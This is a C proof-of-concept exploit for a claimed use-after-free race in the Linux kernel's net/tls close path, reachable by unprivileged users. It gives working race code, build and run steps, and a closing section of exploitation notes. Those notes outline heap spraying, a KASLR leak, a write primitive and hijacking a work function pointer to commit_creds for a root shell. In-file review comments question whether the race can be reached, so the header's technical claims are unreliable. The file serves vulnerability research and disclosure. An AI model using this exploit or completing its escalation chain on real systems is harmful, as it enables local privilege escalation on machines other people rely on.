/*
 * poc-tls-uaf-race.c
 *
 * Use-After-Free PoC: TOCTOU race in tls_sk_proto_close()
 * Kernel: Linux 7.1-rc3 (also present in stable 6.x/5.x branches)
 * File:   net/tls/tls_main.c
 *
 * ─── ROOT CAUSE ──────────────────────────────────────────────────────────────
 *
 * tls_sk_proto_close() reads ctx->tx_conf at line 372 WITHOUT holding lock_sock:
 *
 *   L372:  if (ctx->tx_conf == TLS_SW)        // UNLOCKED READ  ← bug
 *   L373:      tls_sw_cancel_work_tx(ctx);     // skipped when race wins
 *   L375:  lock_sock(sk);                      // too late
 *   ...
 *   L389:  if (ctx->tx_conf == TLS_SW)         // second read, now sees TLS_SW
 *   L390:      tls_sw_free_ctx_tx(ctx);        // kfree(tls_sw_context_tx)
 *
 * Concurrent setsockopt(SOL_TLS, TLS_TX) sets ctx->tx_conf = TLS_SW at line 758
 * INSIDE lock_sock.  If setsockopt wins the window [L372 .. L375]:
 *
 *   - tls_sw_cancel_work_tx() is SKIPPED  → BIT_TX_CLOSING never set,
 *     disable_delayed_work_sync() never called
 *   - tls_sw_free_ctx_tx() IS called      → kfree(tls_sw_context_tx)
 *   - tx_work_handler fires 1 jiffy later → accesses freed memory (UAF)
 *
 * ─── UAF READ/WRITE SITES ────────────────────────────────────────────────────
 *
 * tx_work_handler (tls_sw.c:2637):
 *   L2649:  test_bit(BIT_TX_CLOSING, &ctx->tx_bitmask)      UAF read
 *   L2653:  test_and_clear_bit(BIT_TX_SCHEDULED, ...)        UAF read/write
 *   L2658:  tls_tx_records(sk, -1)  — traverses ctx->tx_list UAF read
 *
 * tls_encrypt_done (tls_sw.c:467):
 *   L497:   ctx->async_wait.err = err                        UAF write
 *   L521:   atomic_dec_and_test(&ctx->encrypt_pending)       UAF read/write
 *   L522:   complete(&ctx->async_wait.completion)            UAF write
 *
 * ─── PRIVILEGES ──────────────────────────────────────────────────────────────
 * No root, no CAP_NET_ADMIN.  Any user with a TCP socket.
 *
 * ─── DETECTION ───────────────────────────────────────────────────────────────
 * Build kernel with CONFIG_KASAN=y CONFIG_KASAN_INLINE=y.
 * After running the PoC:
 *   sudo dmesg | grep -A 40 "BUG: KASAN: use-after-free"
 *
 * ─── BUILD ───────────────────────────────────────────────────────────────────
 *   gcc -O2 -pthread -o poc-tls-uaf-race poc-tls-uaf-race.c
 *
 * ─── RUN ─────────────────────────────────────────────────────────────────────
 *   sudo modprobe tls          # ensure TLS ULP is loaded
 *   ./poc-tls-uaf-race
 *   sudo dmesg | tail -60
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <linux/tls.h>
#include <arpa/inet.h>

/* ── tunables ── */
#define RACE_PORT    0x4242
#define RACE_ITER    100000   /* iterations; ~thousands needed to win the race */
#define CPU_CLOSE    0        /* CPU for the close() racer */
#define CPU_SETOPT   1        /* CPU for the setsockopt() racer */

/* ── Crypto parameters passed to setsockopt(SOL_TLS, TLS_TX) by
 *    racer_setsockopt().  Only the protocol version and cipher type are
 *    filled in; iv, key, salt and rec_seq stay zero-initialized.  This
 *    program never sends data on the socket, and the header analysis states
 *    that zero key material is sufficient to reach the tx_conf assignment
 *    (kernel-side claim, not verifiable from this file). ── */
static const struct tls12_crypto_info_aes_gcm_128 tls_info = {
    .info.version     = TLS_1_2_VERSION,
    .info.cipher_type = TLS_CIPHER_AES_GCM_128,
    /* every member not named above is implicitly zero */
};

/* ── shared per-iteration state ── */
/*
 * State handed to both racer threads for a single iteration.  main() builds
 * one instance on its stack per loop pass and joins both threads before the
 * instance goes out of scope.
 */
struct iter_state {
    int fd;                 /* socket under test: closed by racer_close, configured by racer_setsockopt */
    pthread_barrier_t bar; /* start barrier (initialised with count 2 in main): both racers wait here */
};

/* Listening socket: assigned once in main(), read by srv_thread() for accept(). */
static int g_listen_fd = -1;

/* ────────────────────────────────────────────────────────────────────────────
 * Server thread: accepts connections on g_listen_fd and closes each one
 * immediately.  Its only job is to keep the listen backlog drained so that
 * tcp_connect() in main() keeps succeeding.
 *
 * Transient accept() failures (EINTR, ECONNABORTED) are retried: leaving the
 * loop on those would stop the backlog from being drained and stall every
 * later connect().  Any other error ends the thread.
 *
 * arg is unused.  Always returns NULL.
 * ──────────────────────────────────────────────────────────────────────────── */
static void *srv_thread(void *arg)
{
    (void)arg;
    for (;;) {
        int fd = accept(g_listen_fd, NULL, NULL);
        if (fd >= 0) {
            close(fd);
            continue;
        }
        /* Interrupted call or peer gone before accept: not fatal, retry. */
        if (errno == EINTR || errno == ECONNABORTED)
            continue;
        break;
    }
    return NULL;
}

/* ────────────────────────────────────────────────────────────────────────────
 * Racer A: waits on the iteration's start barrier, then close()s the shared
 * descriptor.
 *
 * According to the analysis in the file header, this is the thread meant to
 * enter tls_sk_proto_close() and perform the unlocked tx_conf read; that is
 * a statement about kernel code and is not verifiable from this file.
 *
 * NOTE(review): close(2) only drops this thread's descriptor; the socket's
 * release path runs when the last reference to the open file goes away.  A
 * setsockopt() already in flight in Racer B may hold such a reference for the
 * duration of the call, which would order the release after it — confirm the
 * claimed window is actually reachable before relying on this reproducer.
 *
 * arg points to the iteration's struct iter_state.  Always returns NULL.
 * ──────────────────────────────────────────────────────────────────────────── */
static void *racer_close(void *arg)
{
    struct iter_state *const st = arg;

    /* Rendezvous with the other racer so both start together. */
    pthread_barrier_wait(&st->bar);

    close(st->fd);

    return NULL;
}

/* ────────────────────────────────────────────────────────────────────────────
 * Racer B: waits on the iteration's start barrier, then issues
 * setsockopt(fd, SOL_TLS, TLS_TX, &tls_info) on the shared descriptor.
 *
 * According to the analysis in the file header, this call is meant to switch
 * the socket's TX configuration to software TLS under the socket lock while
 * Racer A is inside its close path; that is a statement about kernel code and
 * is not verifiable from this file.
 *
 * The result of setsockopt() is deliberately discarded: the call is expected
 * to fail (e.g. with EBADF) whenever Racer A has already closed the
 * descriptor, and no caller inspects the outcome.
 *
 * arg points to the iteration's struct iter_state.  Always returns NULL.
 * ──────────────────────────────────────────────────────────────────────────── */
static void *racer_setsockopt(void *arg)
{
    struct iter_state *const st = arg;

    /* Rendezvous with the other racer so both start together. */
    pthread_barrier_wait(&st->bar);

    (void)setsockopt(st->fd, SOL_TLS, TLS_TX, &tls_info, sizeof(tls_info));

    return NULL;
}

/* ── helpers ── */

/*
 * Best-effort: restrict thread `thr` to the single logical CPU `cpu`.
 * The result of pthread_setaffinity_np() is intentionally ignored, so a
 * request that cannot be honoured leaves the thread's affinity unchanged
 * and is not reported.
 */
static void pin_thread(pthread_t thr, int cpu)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);

    (void)pthread_setaffinity_np(thr, sizeof mask, &mask);
}

/*
 * Create a TCP socket listening on 127.0.0.1:`port`.
 *
 * SO_REUSEADDR is requested on a best-effort basis (its result is ignored).
 * Returns the listening descriptor on success.  On failure a diagnostic is
 * printed with perror(), any socket that was created is closed, and -1 is
 * returned.
 */
static int setup_listen(int port)
{
    struct sockaddr_in addr = {
        .sin_family      = AF_INET,
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
        .sin_port        = htons(port),
    };
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) { perror("socket"); return -1; }

    int one = 1;
    (void)setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) ||
        listen(fd, SOMAXCONN)) {
        /* Report first (perror reads errno), then release the socket so the
         * failure path does not leak a descriptor. */
        perror("bind/listen");
        close(fd);
        return -1;
    }
    return fd;
}

/*
 * Open a TCP connection to 127.0.0.1:`port`.
 *
 * Returns the connected descriptor, or -1 if the socket could not be created
 * or the connect failed (the socket is closed in the latter case).  No
 * diagnostic is printed.
 */
static int tcp_connect(int port)
{
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
        return -1;

    const struct sockaddr_in peer = {
        .sin_family      = AF_INET,
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
        .sin_port        = htons(port),
    };

    if (connect(sock, (const struct sockaddr *)&peer, sizeof peer) >= 0)
        return sock;

    close(sock);
    return -1;
}

/* ── main ── */

/*
 * Harness entry point.
 *
 * Starts a loopback listener plus a server thread that drains it, then runs
 * up to RACE_ITER iterations.  Each iteration opens a fresh TCP connection,
 * attaches the "tls" ULP, and lets racer_close() and racer_setsockopt() run
 * against the same descriptor after a common start barrier.
 *
 * Returns 0 when the loop ran to completion, 1 on a setup failure (listener,
 * thread or barrier creation, or the TLS ULP being unavailable).  The final
 * summary reports how many iterations actually ran both racers, which can be
 * lower than RACE_ITER when connections or ULP attachment fail.
 */
int main(void)
{
    int exit_code = 0;
    int raced = 0;      /* iterations in which both racers were started and joined */
    int tls_ok = 0;     /* set once the ULP has been attached successfully */
    int rc;

    printf("╔══════════════════════════════════════════════════════════════╗\n");
    printf("║  net/tls TOCTOU UAF PoC — Linux 7.1-rc3                    ║\n");
    printf("║  Bug: tls_main.c:372 reads tx_conf without lock_sock        ║\n");
    printf("╚══════════════════════════════════════════════════════════════╝\n\n");

    g_listen_fd = setup_listen(RACE_PORT);
    if (g_listen_fd < 0) return 1;

    pthread_t srv;
    rc = pthread_create(&srv, NULL, srv_thread, NULL);
    if (rc != 0) {
        /* pthread functions return the error number instead of setting errno */
        fprintf(stderr, "[!] pthread_create(server): %s\n", strerror(rc));
        close(g_listen_fd);
        return 1;
    }

    for (int i = 0; i < RACE_ITER; i++) {

        /* 1. Fresh TCP connection */
        int fd = tcp_connect(RACE_PORT);
        if (fd < 0) continue;

        /* 2. Attach TLS ULP */
        if (setsockopt(fd, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) {
            int ulp_errno = errno;  /* save before close() can overwrite it */
            close(fd);
            if (!tls_ok && (ulp_errno == ENOENT || ulp_errno == ENOPROTOOPT)) {
                fprintf(stderr,
                    "[!] TLS ULP unavailable. Run:  sudo modprobe tls\n");
                exit_code = 1;
                break;
            }
            continue;
        }
        tls_ok = 1;

        /*
         * 3. Race:
         *    Thread A: close(fd)
         *    Thread B: setsockopt(fd, SOL_TLS, TLS_TX)
         *    Both block on a two-party barrier and are released together.
         */
        struct iter_state state = { .fd = fd };
        rc = pthread_barrier_init(&state.bar, NULL, 2);
        if (rc != 0) {
            fprintf(stderr, "[!] pthread_barrier_init: %s\n", strerror(rc));
            close(fd);
            exit_code = 1;
            break;
        }

        pthread_t ta, tb;
        rc = pthread_create(&ta, NULL, racer_close, &state);
        if (rc != 0) {
            fprintf(stderr, "[!] pthread_create(close racer): %s\n", strerror(rc));
            pthread_barrier_destroy(&state.bar);
            close(fd);
            exit_code = 1;
            break;
        }
        rc = pthread_create(&tb, NULL, racer_setsockopt, &state);
        if (rc != 0) {
            fprintf(stderr, "[!] pthread_create(setsockopt racer): %s\n", strerror(rc));
            /* Thread A is (or will be) parked on the barrier.  Act as the
             * second participant so it is released; it then closes fd. */
            pthread_barrier_wait(&state.bar);
            pthread_join(ta, NULL);
            pthread_barrier_destroy(&state.bar);
            exit_code = 1;
            break;
        }

        /* Request separate CPUs for the two racers (best effort) */
        pin_thread(ta, CPU_CLOSE);
        pin_thread(tb, CPU_SETOPT);

        pthread_join(ta, NULL);
        pthread_join(tb, NULL);
        pthread_barrier_destroy(&state.bar);
        raced++;

        if (i % 5000 == 0 && i > 0)
            printf("[%6d / %d] races attempted — check dmesg\n", i, RACE_ITER);
    }

    printf("\n[done] %d of %d iterations ran both racers.\n", raced, RACE_ITER);
    if (raced > 0) {
        printf("\nTo check for UAF (requires CONFIG_KASAN=y kernel):\n");
        printf("  sudo dmesg | grep -A 40 'BUG: KASAN: use-after-free'\n\n");
        printf("Expected KASAN report sites:\n");
        printf("  net/tls/tls_sw.c:%d  tx_work_handler — test_bit(BIT_TX_CLOSING)\n", 2649);
        printf("  net/tls/tls_sw.c:%d  tx_work_handler — tls_tx_records()\n", 2658);
        printf("  net/tls/tls_sw.c:%d  tls_encrypt_done — ctx->async_wait.err write\n", 497);
    }

    /* Stop the server thread before closing the descriptor it may still be
     * blocked on in accept(). */
    pthread_cancel(srv);
    pthread_join(srv, NULL);
    close(g_listen_fd);
    return exit_code;
}

/*
 * ─── EXPLOITATION NOTES ──────────────────────────────────────────────────────
 *
 * Stage 1 — UAF primitive acquisition
 *   Win the race above.  tls_sw_context_tx (~168 bytes, kmalloc-256 slab)
 *   is freed while tx_work_handler still holds a work_struct pointer to it.
 *
 * Stage 2 — Heap reclaim (cross-cache spray)
 *   Allocate kmalloc-256 objects from user space before tx_work_handler fires:
 *     • msg_msg (sendmsg with msgsz ≤ 256-sizeof(struct msg_msg))
 *     • pipe_buffer (pipe with PAGE_SIZE chunk)
 *     • sk_buff head (alloc_skb with small data)
 *   Fill the reclaimed chunk with controlled bytes.
 *
 * Stage 3a — Info leak
 *   tx_work_handler reads ctx->tx_bitmask (offset +0x98).
 *   tls_encrypt_done reads ctx->async_wait.completion (offset +0x10).
 *   If the reclaimed chunk contains a kernel pointer placed by the spray
 *   object, reading it via a shared BPF map or /proc gives KASLR defeat.
 *
 * Stage 3b — Arbitrary write
 *   complete() in tls_encrypt_done performs:
 *     swait_active(&x->wait) check → wake_up_process(wait->task)
 *   If the reclaimed chunk's offset +0x18 (swait_queue_head.task_list.next)
 *   points to a controlled task_struct pointer, wake_up_process writes
 *   to controlled memory → write-what-where primitive.
 *
 * Stage 3c — Function pointer hijack (full LPE)
 *   After kfree, tx_work_handler reschedules via:
 *     schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10))
 *   ctx->tx_work.work is a struct delayed_work.  Its embedded work_struct
 *   contains a work_func_t func pointer (offset 0x00 in work_struct).
 *   Spray the freed 256-byte slab slot such that offset 0x00 holds a
 *   controlled kernel address (e.g., commit_creds(prepare_kernel_cred(0))).
 *   When schedule_delayed_work is called on the freed-and-reclaimed chunk,
 *   the workqueue calls that function → privileged code execution →
 *   uid/gid = 0 → root shell.
 *
 * ─── AFFECTED STABLE KERNELS ─────────────────────────────────────────────────
 *   The unlocked read at tls_main.c:372 (or equivalent line in older trees)
 *   appears in all kernels with CONFIG_TLS since ~v4.13.  Check:
 *     git log --all -S 'tls_sw_cancel_work_tx' net/tls/tls_main.c
 */
